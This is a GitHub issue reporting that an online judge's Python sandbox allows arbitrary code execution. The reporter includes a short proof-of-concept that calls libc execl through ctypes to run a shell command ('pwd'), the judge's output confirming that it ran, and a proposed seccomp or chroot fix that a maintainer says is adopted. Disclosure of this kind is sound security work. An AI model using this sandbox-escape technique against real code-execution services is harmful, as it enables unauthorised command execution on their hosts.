[VULN] Python Arbitrary Code Execution

Question

[VULN] Python Arbitrary Code Execution

asef18766 opened this issue 5 years ago · comments

Describe the bug
vulnerbility of arbitrary code execution

To Reproduce
Steps to reproduce the behavior:

produce the following Python code

import ctypes

command = "pwd"

libc = ctypes.CDLL('libc.so.6')
Cexecve=libc.execl
arg0 = ctypes.create_string_buffer(10)
arg1 = ctypes.create_string_buffer(10)
arg2 = ctypes.create_string_buffer(10)
arg3 = ctypes.create_string_buffer(len(command)+1)

arg0.value = b"/bin/sh"
arg1.value = b"sh"
arg2.value = b"-c"
arg3.value = command.encode()
Cexecve(arg0,arg1,arg2,arg3,0)

Expected behavior
return RE state

Current Behavior
return the following format response

{
            "score": 0,
            "status": 1,
            "cases": [
                {
                    "stdout": "/src\n",
                    "stderr": "",
                    "exitCode": 0,
                    "execTime": 17,
                    "memoryUsage": 8412,
                    "status": 1
                }
            ]
}

Possible Solution
Add Python seccomp profile or chroot it

Siao,Yu-Jie commented 5 years ago

fixed

Siao,Yu-Jie · Answer 1 · Thu Jan 02 2020 11:41:17 GMT+0800 (China Standard Time)

rules will be added in next version